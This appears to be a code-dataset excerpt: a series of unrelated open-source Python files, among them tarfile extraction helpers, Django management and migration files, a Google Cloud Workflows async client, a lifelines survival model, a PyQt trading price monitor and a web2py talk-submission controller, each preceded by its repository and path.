targetpath. """ source = self.fileobj source.seek(tarinfo.offset_data) target = bltn_open(targetpath, "wb") if tarinfo.sparse is not None: for offset, size in tarinfo.sparse: target.seek(offset) copyfileobj(source, target, size) else: copyfileobj(source, target, tarinfo.size) target.seek(tarinfo.size) target.truncate() target.close() def makeunknown(self, tarinfo, targetpath): """Make a file from a TarInfo object with an unknown type at targetpath. """ self.makefile(tarinfo, targetpath) self._dbg(1, "tarfile: Unknown file type %r, " \ "extracted as regular file." % tarinfo.type) def makefifo(self, tarinfo, targetpath): """Make a fifo called targetpath. """ if hasattr(os, "mkfifo"): os.mkfifo(targetpath) else: raise ExtractError("fifo not supported by system") def makedev(self, tarinfo, targetpath): """Make a character or block device called targetpath. """ if not hasattr(os, "mknod") or not hasattr(os, "makedev"): raise ExtractError("special devices not supported by system") mode = tarinfo.mode if tarinfo.isblk(): mode |= stat.S_IFBLK else: mode |= stat.S_IFCHR os.mknod(targetpath, mode, os.makedev(tarinfo.devmajor, tarinfo.devminor)) def makelink(self, tarinfo, targetpath): """Make a (symbolic) link called targetpath. If it cannot be created (platform limitation), we try to make a copy of the referenced file instead of a link. """ try: # For systems that support symbolic and hard links. if tarinfo.issym(): os.symlink(tarinfo.linkname, targetpath) else: # See extract(). if os.path.exists(tarinfo._link_target): os.link(tarinfo._link_target, targetpath) else: self._extract_member(self._find_link_target(tarinfo), targetpath) except symlink_exception: if tarinfo.issym(): linkpath = os.path.join(os.path.dirname(tarinfo.name), tarinfo.linkname) else: linkpath = tarinfo.linkname else: try: self._extract_member(self._find_link_target(tarinfo), targetpath) except KeyError: raise ExtractError("unable to resolve link inside archive") def chown(self, tarinfo, targetpath): """Set owner of targetpath according to tarinfo. """ if pwd and hasattr(os, "geteuid") and os.geteuid() == 0: # We have to be root to do so. try: g = grp.getgrnam(tarinfo.gname)[2] except KeyError: g = tarinfo.gid try: u = pwd.getpwnam(tarinfo.uname)[2] except KeyError: u = tarinfo.uid try: if tarinfo.issym() and hasattr(os, "lchown"): os.lchown(targetpath, u, g) else: if sys.platform != "os2emx": os.chown(targetpath, u, g) except EnvironmentError as e: raise ExtractError("could not change owner") def chmod(self, tarinfo, targetpath): """Set file permissions of targetpath according to tarinfo. """ if hasattr(os, 'chmod'): try: os.chmod(targetpath, tarinfo.mode) except EnvironmentError as e: raise ExtractError("could not change mode") def utime(self, tarinfo, targetpath): """Set modification time of targetpath according to tarinfo. """ if not hasattr(os, 'utime'): return try: os.utime(targetpath, (tarinfo.mtime, tarinfo.mtime)) except EnvironmentError as e: raise ExtractError("could not change modification time") #-------------------------------------------------------------------------- def next(self): """Return the next member of the archive as a TarInfo object, when TarFile is opened for reading. Return None if there is no more available. """ self._check("ra") if self.firstmember is not None: m = self.firstmember self.firstmember = None return m # Read the next block. self.fileobj.seek(self.offset) tarinfo = None while True: try: tarinfo = self.tarinfo.fromtarfile(self) except EOFHeaderError as e: if self.ignore_zeros: self._dbg(2, "0x%X: %s" % (self.offset, e)) self.offset += BLOCKSIZE continue except InvalidHeaderError as e: if self.ignore_zeros: self._dbg(2, "0x%X: %s" % (self.offset, e)) self.offset += BLOCKSIZE continue elif self.offset == 0: raise ReadError(str(e)) except EmptyHeaderError: if self.offset == 0: raise ReadError("empty file") except TruncatedHeaderError as e: if self.offset == 0: raise ReadError(str(e)) except SubsequentHeaderError as e: raise ReadError(str(e)) break if tarinfo is not None: self.members.append(tarinfo) else: self._loaded = True return tarinfo #-------------------------------------------------------------------------- # Little helper methods: def _getmember(self, name, tarinfo=None, normalize=False): """Find an archive member by name from bottom to top. If tarinfo is given, it is used as the starting point. """ # Ensure that all members have been loaded. members = self.getmembers() # Limit the member search list up to tarinfo. if tarinfo is not None: members = members[:members.index(tarinfo)] if normalize: name = os.path.normpath(name) for member in reversed(members): if normalize: member_name = os.path.normpath(member.name) else: member_name = member.name if name == member_name: return member def _load(self): """Read through the entire archive file and look for readable members. """ while True: tarinfo = self.next() if tarinfo is None: break self._loaded = True def _check(self, mode=None): """Check if TarFile is still open, and if the operation's mode corresponds to TarFile's mode. """ if self.closed: raise IOError("%s is closed" % self.__class__.__name__) if mode is not None and self.mode not in mode: raise IOError("bad operation for mode %r" % self.mode) def _find_link_target(self, tarinfo): """Find the target member of a symlink or hardlink member in the archive. """ if tarinfo.issym(): # Always search the entire archive. linkname = os.path.dirname(tarinfo.name) + "/" + tarinfo.linkname limit = None else: # Search the archive before the link, because a hard link is # just a reference to an already archived file. linkname = tarinfo.linkname limit = tarinfo member = self._getmember(linkname, tarinfo=limit, normalize=True) if member is None: raise KeyError("linkname %r not found" % linkname) return member def __iter__(self): """Provide an iterator object. """ if self._loaded: return iter(self.members) else: return TarIter(self) def _dbg(self, level, msg): """Write debugging output to sys.stderr. """ if level <= self.debug: print(msg, file=sys.stderr) def __enter__(self): self._check() return self def __exit__(self, type, value, traceback): if type is None: self.close() else: # An exception occurred. We must not call close() because # it would try to write end-of-archive blocks and padding. if not self._extfileobj: self.fileobj.close() self.closed = True # class TarFile class TarIter(object): """Iterator Class. for tarinfo in TarFile(...): suite... """ def __init__(self, tarfile): """Construct a TarIter object. """ self.tarfile = tarfile self.index = 0 def __iter__(self): """Return iterator object. """ return self def __next__(self): """Return the next item using TarFile's next() method. When all members have been read, set TarFile as _loaded. """ # Fix for SF #1100429: Under rare circumstances it can # happen that getmembers() is called during iteration, # which will cause TarIter to stop prematurely. if not self.tarfile._loaded: tarinfo = self.tarfile.next() if not tarinfo: self.tarfile._loaded = True raise StopIteration else: try: tarinfo = self.tarfile.members[self.index] except IndexError: raise StopIteration self.index += 1 return tarinfo next = __next__ # for Python 2.x #-------------------- # exported functions #-------------------- def is_tarfile(name): """Return True if name points to a tar archive that we are able to handle, else return False. """ try: t = open(name) t.close() return True except TarError: return False bltn_open = open open = TarFile.open
frankvdp/django
refs/heads/master
django/contrib/sessions/management/commands/clearsessions.py
729
from importlib import import_module from django.conf import settings from django.core.management.base import BaseCommand class Command(BaseCommand): help = ( "Can be run as a cronjob or directly to clean out expired sessions " "(only with the database backend at the moment)." ) def handle(self, **options): engine = import_module(settings.SESSION_ENGINE) try: engine.SessionStore.clear_expired() except NotImplementedError: self.stderr.write("Session engine '%s' doesn't support clearing " "expired sessions.\n" % settings.SESSION_ENGINE)
d-plaindoux/fluent-rest
refs/heads/master
fluent_rest/spec/__init__.py
1
# Copyright (C)2016 D. Plaindoux. # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published by # the Free Software Foundation; either version 2, or (at your option) any # later version. from fluent_rest.spec.rest import *
googleapis/python-workflows
refs/heads/master
google/cloud/workflows_v1/services/workflows/async_client.py
1
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict import functools import re from typing import Dict, Sequence, Tuple, Type, Union import pkg_resources import google.api_core.client_options as ClientOptions # type: ignore from google.api_core import exceptions as core_exceptions # type: ignore from google.api_core import gapic_v1 # type: ignore from google.api_core import retry as retries # type: ignore from google.auth import credentials as ga_credentials # type: ignore from google.oauth2 import service_account # type: ignore from google.api_core import operation # type: ignore from google.api_core import operation_async # type: ignore from google.cloud.workflows_v1.services.workflows import pagers from google.cloud.workflows_v1.types import workflows from google.protobuf import empty_pb2 # type: ignore from google.protobuf import field_mask_pb2 # type: ignore from google.protobuf import timestamp_pb2 # type: ignore from .transports.base import WorkflowsTransport, DEFAULT_CLIENT_INFO from .transports.grpc_asyncio import WorkflowsGrpcAsyncIOTransport from .client import WorkflowsClient class WorkflowsAsyncClient: """Workflows is used to deploy and execute workflow programs. Workflows makes sure the program executes reliably, despite hardware and networking interruptions. """ _client: WorkflowsClient DEFAULT_ENDPOINT = WorkflowsClient.DEFAULT_ENDPOINT DEFAULT_MTLS_ENDPOINT = WorkflowsClient.DEFAULT_MTLS_ENDPOINT workflow_path = staticmethod(WorkflowsClient.workflow_path) parse_workflow_path = staticmethod(WorkflowsClient.parse_workflow_path) common_billing_account_path = staticmethod( WorkflowsClient.common_billing_account_path ) parse_common_billing_account_path = staticmethod( WorkflowsClient.parse_common_billing_account_path ) common_folder_path = staticmethod(WorkflowsClient.common_folder_path) parse_common_folder_path = staticmethod(WorkflowsClient.parse_common_folder_path) common_organization_path = staticmethod(WorkflowsClient.common_organization_path) parse_common_organization_path = staticmethod( WorkflowsClient.parse_common_organization_path ) common_project_path = staticmethod(WorkflowsClient.common_project_path) parse_common_project_path = staticmethod(WorkflowsClient.parse_common_project_path) common_location_path = staticmethod(WorkflowsClient.common_location_path) parse_common_location_path = staticmethod( WorkflowsClient.parse_common_location_path ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: WorkflowsAsyncClient: The constructed client. """ return WorkflowsClient.from_service_account_info.__func__(WorkflowsAsyncClient, info, *args, **kwargs) # type: ignore @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: WorkflowsAsyncClient: The constructed client. """ return WorkflowsClient.from_service_account_file.__func__(WorkflowsAsyncClient, filename, *args, **kwargs) # type: ignore from_service_account_json = from_service_account_file @property def transport(self) -> WorkflowsTransport: """Returns the transport used by the client instance. Returns: WorkflowsTransport: The transport used by the client instance. """ return self._client.transport get_transport_class = functools.partial( type(WorkflowsClient).get_transport_class, type(WorkflowsClient) ) def __init__( self, *, credentials: ga_credentials.Credentials = None, transport: Union[str, WorkflowsTransport] = "grpc_asyncio", client_options: ClientOptions = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiates the workflows client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.WorkflowsTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. Raises: google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport creation failed for any reason. """ self._client = WorkflowsClient( credentials=credentials, transport=transport, client_options=client_options, client_info=client_info, ) async def list_workflows( self, request: workflows.ListWorkflowsRequest = None, *, parent: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> pagers.ListWorkflowsAsyncPager: r"""Lists Workflows in a given project and location. The default order is not specified. Args: request (:class:`google.cloud.workflows_v1.types.ListWorkflowsRequest`): The request object. Request for the [ListWorkflows][google.cloud.workflows.v1.Workflows.ListWorkflows] method. parent (:class:`str`): Required. Project and location from which the workflows should be listed. Format: projects/{project}/locations/{location} This corresponds to the ``parent`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.workflows_v1.services.workflows.pagers.ListWorkflowsAsyncPager: Response for the [ListWorkflows][google.cloud.workflows.v1.Workflows.ListWorkflows] method. Iterating over this object will yield results and resolve additional pages automatically. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([parent]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.ListWorkflowsRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if parent is not None: request.parent = parent # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.list_workflows, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # This method is paged; wrap the response in a pager, which provides # an `__aiter__` convenience method. response = pagers.ListWorkflowsAsyncPager( method=rpc, request=request, response=response, metadata=metadata, ) # Done; return the response. return response async def get_workflow( self, request: workflows.GetWorkflowRequest = None, *, name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> workflows.Workflow: r"""Gets details of a single Workflow. Args: request (:class:`google.cloud.workflows_v1.types.GetWorkflowRequest`): The request object. Request for the [GetWorkflow][google.cloud.workflows.v1.Workflows.GetWorkflow] method. name (:class:`str`): Required. Name of the workflow which information should be retrieved. Format: projects/{project}/locations/{location}/workflows/{workflow} This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.cloud.workflows_v1.types.Workflow: Workflow program to be executed by Workflows. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.GetWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if name is not None: request.name = name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.get_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Done; return the response. return response async def create_workflow( self, request: workflows.CreateWorkflowRequest = None, *, parent: str = None, workflow: workflows.Workflow = None, workflow_id: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> operation_async.AsyncOperation: r"""Creates a new workflow. If a workflow with the specified name already exists in the specified project and location, the long running operation will return [ALREADY_EXISTS][google.rpc.Code.ALREADY_EXISTS] error. Args: request (:class:`google.cloud.workflows_v1.types.CreateWorkflowRequest`): The request object. Request for the [CreateWorkflow][google.cloud.workflows.v1.Workflows.CreateWorkflow] method. parent (:class:`str`): Required. Project and location in which the workflow should be created. Format: projects/{project}/locations/{location} This corresponds to the ``parent`` field on the ``request`` instance; if ``request`` is provided, this should not be set. workflow (:class:`google.cloud.workflows_v1.types.Workflow`): Required. Workflow to be created. This corresponds to the ``workflow`` field on the ``request`` instance; if ``request`` is provided, this should not be set. workflow_id (:class:`str`): Required. The ID of the workflow to be created. It has to fulfill the following requirements: - Must contain only letters, numbers, underscores and hyphens. - Must start with a letter. - Must be between 1-64 characters. - Must end with a number or a letter. - Must be unique within the customer project and location. This corresponds to the ``workflow_id`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.api_core.operation_async.AsyncOperation: An object representing a long-running operation. The result type for the operation will be :class:`google.cloud.workflows_v1.types.Workflow` Workflow program to be executed by Workflows. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([parent, workflow, workflow_id]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.CreateWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if parent is not None: request.parent = parent if workflow is not None: request.workflow = workflow if workflow_id is not None: request.workflow_id = workflow_id # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.create_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Wrap the response in an operation future. response = operation_async.from_gapic( response, self._client._transport.operations_client, workflows.Workflow, metadata_type=workflows.OperationMetadata, ) # Done; return the response. return response async def delete_workflow( self, request: workflows.DeleteWorkflowRequest = None, *, name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> operation_async.AsyncOperation: r"""Deletes a workflow with the specified name. This method also cancels and deletes all running executions of the workflow. Args: request (:class:`google.cloud.workflows_v1.types.DeleteWorkflowRequest`): The request object. Request for the [DeleteWorkflow][google.cloud.workflows.v1.Workflows.DeleteWorkflow] method. name (:class:`str`): Required. Name of the workflow to be deleted. Format: projects/{project}/locations/{location}/workflows/{workflow} This corresponds to the ``name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.api_core.operation_async.AsyncOperation: An object representing a long-running operation. The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated empty messages in your APIs. A typical example is to use it as the request or the response type of an API method. For instance: service Foo { rpc Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON representation for Empty is empty JSON object {}. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([name]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.DeleteWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if name is not None: request.name = name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.delete_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Wrap the response in an operation future. response = operation_async.from_gapic( response, self._client._transport.operations_client, empty_pb2.Empty, metadata_type=workflows.OperationMetadata, ) # Done; return the response. return response async def update_workflow( self, request: workflows.UpdateWorkflowRequest = None, *, workflow: workflows.Workflow = None, update_mask: field_mask_pb2.FieldMask = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> operation_async.AsyncOperation: r"""Updates an existing workflow. Running this method has no impact on already running executions of the workflow. A new revision of the workflow may be created as a result of a successful update operation. In that case, such revision will be used in new workflow executions. Args: request (:class:`google.cloud.workflows_v1.types.UpdateWorkflowRequest`): The request object. Request for the [UpdateWorkflow][google.cloud.workflows.v1.Workflows.UpdateWorkflow] method. workflow (:class:`google.cloud.workflows_v1.types.Workflow`): Required. Workflow to be updated. This corresponds to the ``workflow`` field on the ``request`` instance; if ``request`` is provided, this should not be set. update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`): List of fields to be updated. If not present, the entire workflow will be updated. This corresponds to the ``update_mask`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.api_core.operation_async.AsyncOperation: An object representing a long-running operation. The result type for the operation will be :class:`google.cloud.workflows_v1.types.Workflow` Workflow program to be executed by Workflows. """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. has_flattened_params = any([workflow, update_mask]) if request is not None and has_flattened_params: raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) request = workflows.UpdateWorkflowRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if workflow is not None: request.workflow = workflow if update_mask is not None: request.update_mask = update_mask # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = gapic_v1.method_async.wrap_method( self._client._transport.update_workflow, default_timeout=None, client_info=DEFAULT_CLIENT_INFO, ) # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata( (("workflow.name", request.workflow.name),) ), ) # Send the request. response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,) # Wrap the response in an operation future. response = operation_async.from_gapic( response, self._client._transport.operations_client, workflows.Workflow, metadata_type=workflows.OperationMetadata, ) # Done; return the response. return response try: DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo( gapic_version=pkg_resources.get_distribution("google-cloud-workflows",).version, ) except pkg_resources.DistributionNotFound: DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo() __all__ = ("WorkflowsAsyncClient",)
ybroze/trading-with-python
refs/heads/master
nautilus/nautilus.py
77
''' Created on 26 dec. 2011 Copyright: Jev Kuznetsov License: BSD ''' from PyQt4.QtCore import * from PyQt4.QtGui import * from ib.ext.Contract import Contract from ib.opt import ibConnection from ib.ext.Order import Order import tradingWithPython.lib.logger as logger from tradingWithPython.lib.eventSystem import Sender, ExampleListener import tradingWithPython.lib.qtpandas as qtpandas import numpy as np import pandas priceTicks = {1:'bid',2:'ask',4:'last',6:'high',7:'low',9:'close', 14:'open'} class PriceListener(qtpandas.DataFrameModel): def __init__(self): super(PriceListener,self).__init__() self._header = ['position','bid','ask','last'] def addSymbol(self,symbol): data = dict(zip(self._header,[0,np.nan,np.nan,np.nan])) row = pandas.DataFrame(data, index = pandas.Index([symbol])) self.df = self.df.append(row[self._header]) # append data and set correct column order def priceHandler(self,sender,event,msg=None): if msg['symbol'] not in self.df.index: self.addSymbol(msg['symbol']) if msg['type'] in self._header: self.df.ix[msg['symbol'],msg['type']] = msg['price'] self.signalUpdate() #print self.df class Broker(Sender): def __init__(self, name = "broker"): super(Broker,self).__init__() self.name = name self.log = logger.getLogger(self.name) self.log.debug('Initializing broker. Pandas version={0}'.format(pandas.__version__)) self.contracts = {} # a dict to keep track of subscribed contracts self._id2symbol = {} # id-> symbol dict self.tws = None self._nextId = 1 # tws subscription id self.nextValidOrderId = None def connect(self): """ connect to tws """ self.tws = ibConnection() # tws interface self.tws.registerAll(self._defaultHandler) self.tws.register(self._nextValidIdHandler,'NextValidId') self.log.debug('Connecting to tws') self.tws.connect() self.tws.reqAccountUpdates(True,'') self.tws.register(self._priceHandler,'TickPrice') def subscribeStk(self,symbol, secType='STK', exchange='SMART',currency='USD'): ''' subscribe to stock data ''' self.log.debug('Subscribing to '+symbol) c = Contract() c.m_symbol = symbol c.m_secType = secType c.m_exchange = exchange c.m_currency = currency subId = self._nextId self._nextId += 1 self.tws.reqMktData(subId,c,'',False) self._id2symbol[subId] = c.m_symbol self.contracts[symbol]=c def disconnect(self): self.tws.disconnect() #------event handlers-------------------- def _defaultHandler(self,msg): ''' default message handler ''' #print msg.typeName if msg.typeName == 'Error': self.log.error(msg) def _nextValidIdHandler(self,msg): self.nextValidOrderId = msg.orderId self.log.debug( 'Next valid order id:{0}'.format(self.nextValidOrderId)) def _priceHandler(self,msg): #translate to meaningful messages message = {'symbol':self._id2symbol[msg.tickerId], 'price':msg.price, 'type':priceTicks[msg.field]} self.dispatch('price',message) #-----------------GUI elements------------------------- class TableView(QTableView): """ extended table view """ def __init__(self,name='TableView1', parent=None): super(TableView,self).__init__(parent) self.name = name self.setSelectionBehavior(QAbstractItemView.SelectRows) def contextMenuEvent(self, event): menu = QMenu(self) Action = menu.addAction("print selected rows") Action.triggered.connect(self.printName) menu.exec_(event.globalPos()) def printName(self): print "Action triggered from " + self.name print 'Selected :' for idx in self.selectionModel().selectedRows(): print self.model().df.ix[idx.row(),:] class Form(QDialog): def __init__(self,parent=None): super(Form,self).__init__(parent) self.broker = Broker() self.price = PriceListener() self.broker.connect() symbols = ['SPY','XLE','QQQ','VXX','XIV'] for symbol in symbols: self.broker.subscribeStk(symbol) self.broker.register(self.price.priceHandler, 'price') widget = TableView(parent=self) widget.setModel(self.price) widget.horizontalHeader().setResizeMode(QHeaderView.Stretch) layout = QVBoxLayout() layout.addWidget(widget) self.setLayout(layout) def __del__(self): print 'Disconnecting.' self.broker.disconnect() if __name__=="__main__": print "Running nautilus" import sys app = QApplication(sys.argv) form = Form() form.show() app.exec_() print "All done."
CamDavidsonPilon/lifelines
refs/heads/master
lifelines/fitters/log_normal_fitter.py
1
# -*- coding: utf-8 -*- from scipy.special import erfinv import autograd.numpy as np from autograd.scipy.stats import norm from lifelines.fitters import KnownModelParametricUnivariateFitter from lifelines.utils import CensoringType class LogNormalFitter(KnownModelParametricUnivariateFitter): r""" This class implements an Log Normal model for univariate data. The model has parameterized form: .. math:: S(t) = 1 - \Phi\left(\frac{\log(t) - \mu}{\sigma}\right), \;\; \sigma >0 where :math:`\Phi` is the CDF of a standard normal random variable. This implies the cumulative hazard rate is .. math:: H(t) = -\log\left(1 - \Phi\left(\frac{\log(t) - \mu}{\sigma}\right)\right) After calling the ``.fit`` method, you have access to properties like: ``survival_function_``, ``mu_``, ``sigma_``. A summary of the fit is available with the method ``print_summary()`` Parameters ----------- alpha: float, optional (default=0.05) the level in the confidence intervals. Attributes ---------- cumulative_hazard_ : DataFrame The estimated cumulative hazard (with custom timeline if provided) hazard_ : DataFrame The estimated hazard (with custom timeline if provided) survival_function_ : DataFrame The estimated survival function (with custom timeline if provided) cumulative_density_ : DataFrame The estimated cumulative density function (with custom timeline if provided) density_: DataFrame The estimated density function (PDF) (with custom timeline if provided) variance_matrix_ : DataFrame The variance matrix of the coefficients median_survival_time_: float The median time to event mu_: float The fitted parameter in the model sigma_: float The fitted parameter in the model durations: array The durations provided event_observed: array The event_observed variable provided timeline: array The time line to use for plotting and indexing entry: array or None The entry array provided, or None """ mu_: float sigma_: float _fitted_parameter_names = ["mu_", "sigma_"] _bounds = [(None, None), (0, None)] _compare_to_values = np.array([0.0, 1.0]) def _create_initial_point(self, Ts, E, *args): if CensoringType.is_right_censoring(self): log_T = np.log(Ts[0]) elif CensoringType.is_left_censoring(self): log_T = np.log(Ts[1]) elif CensoringType.is_interval_censoring(self): if E.sum() > 0: log_T = np.log(Ts[1][E.astype(bool)]) else: log_T = np.array([0]) return np.array([np.median(log_T), 1.0]) @property def median_survival_time_(self) -> float: return np.exp(self.mu_) def percentile(self, p) -> float: return np.exp(self.mu_ + np.sqrt(2 * self.sigma_ ** 2) * erfinv(1 - 2 * p)) def _cumulative_hazard(self, params, times): mu_, sigma_ = params Z = (np.log(times) - mu_) / sigma_ return -norm.logsf(Z) def _log_hazard(self, params, times): mu_, sigma_ = params Z = (np.log(times) - mu_) / sigma_ return norm.logpdf(Z, loc=0, scale=1) - np.log(sigma_) - np.log(times) - norm.logsf(Z) def _log_1m_sf(self, params, times): mu_, sigma_ = params Z = (np.log(times) - mu_) / sigma_ return norm.logcdf(Z)
BridgeCityBicycleCoop/workstand
refs/heads/master
core/migrations/0002_auto_20170101_2054.py
1
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2017-01-01 20:54 from __future__ import unicode_literals from django.db import migrations, models import django.utils.timezone class Migration(migrations.Migration): dependencies = [ ('core', '0001_initial'), ] operations = [ migrations.AlterField( model_name='visit', name='created_at', field=models.DateTimeField(default=django.utils.timezone.now), ), ]
flisoldf/flisol-inscricoes
refs/heads/master
controllers/atividades.py
1
# -*- coding: utf-8 -*- @auth.requires_membership('Palestrante') def index(): """ Exibe a lista de atividades submetidas """ # Se não houver argumentos na URL, redireciona para a página inicial # O objetivo dessa verificação é não permitir que um palestrante visualize atividades de outro if not request.args: redirect(URL('default', 'index')) palestrante = request.args(0) id_user = str(session.auth.user.id) # Faz a consulta no banco de dados para pegar o id do currículo do palestrante curriculo_id = db(curriculo.id_usuario==session.auth.user.id).select().first() if curriculo_id: # Insere uma notificação para os palestrantes session.flash = "O prazo para a submissão de atividades é até o dia 18 de Março." # Verifica se o argumento passado na URL é o mesmo da sessão do usuário if palestrante == id_user: ativ = db(atividade.id_usuario==palestrante).select() return dict(ativ=ativ, id_user=int(palestrante)) elif form.errors: return dict(ativ=None, id_user=int(palestrante)) else: session.flash = "Escreva o seu mini-curriculo antes de cadastrar sua palestra." redirect(URL('atividades', 'minicurriculo')) def lista_atividades(): """ Exibe a lista de atividades submetidas somente para leitura. """ # Consulta as atividades cadastradas atividades = db().select(db.atividades.ALL, orderby=db.atividades.titulo) return dict(atividades=atividades) @auth.requires_membership('Palestrante') def nova(): """ Essa função é para inserção de novas atividades """ # Ocultando o 